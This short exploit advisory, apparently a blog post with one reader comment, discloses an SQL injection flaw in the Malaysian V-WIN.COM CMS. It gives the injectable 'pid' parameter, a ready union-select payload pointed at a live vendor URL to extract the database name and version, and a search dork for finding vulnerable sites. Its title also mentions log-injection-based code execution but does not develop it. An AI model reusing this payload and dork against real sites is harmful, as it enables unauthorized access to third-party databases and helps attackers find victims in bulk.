LFI to RCE via access_log injection

WEB-CMS - V-WIN.COM CMS - SQL Injection Vuln [private script]


[o] WEB-CMS - V-WIN.COM CMS SQL Injection Vulnerability
Software : WEB-CMS - V-WIN.COM CMS [MALAYSIA WEBSITE CONTENT MANAGEMENT SYSTEM]
Vendor : http://www.v-win.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


[o] Exploit
http://localhost/[path]/?page=pri&pid=[SQL Query]


[o] Live Demo
http://www.v-win.com/cms/?page=pri&pid=-131+union+select+1,2,3,database(),version(),6--


[o] Dork
"Concept, Designed, and Maintained by www.v-win.com"


Comments

labatterie said…
Dnt know how to use this vulnerability.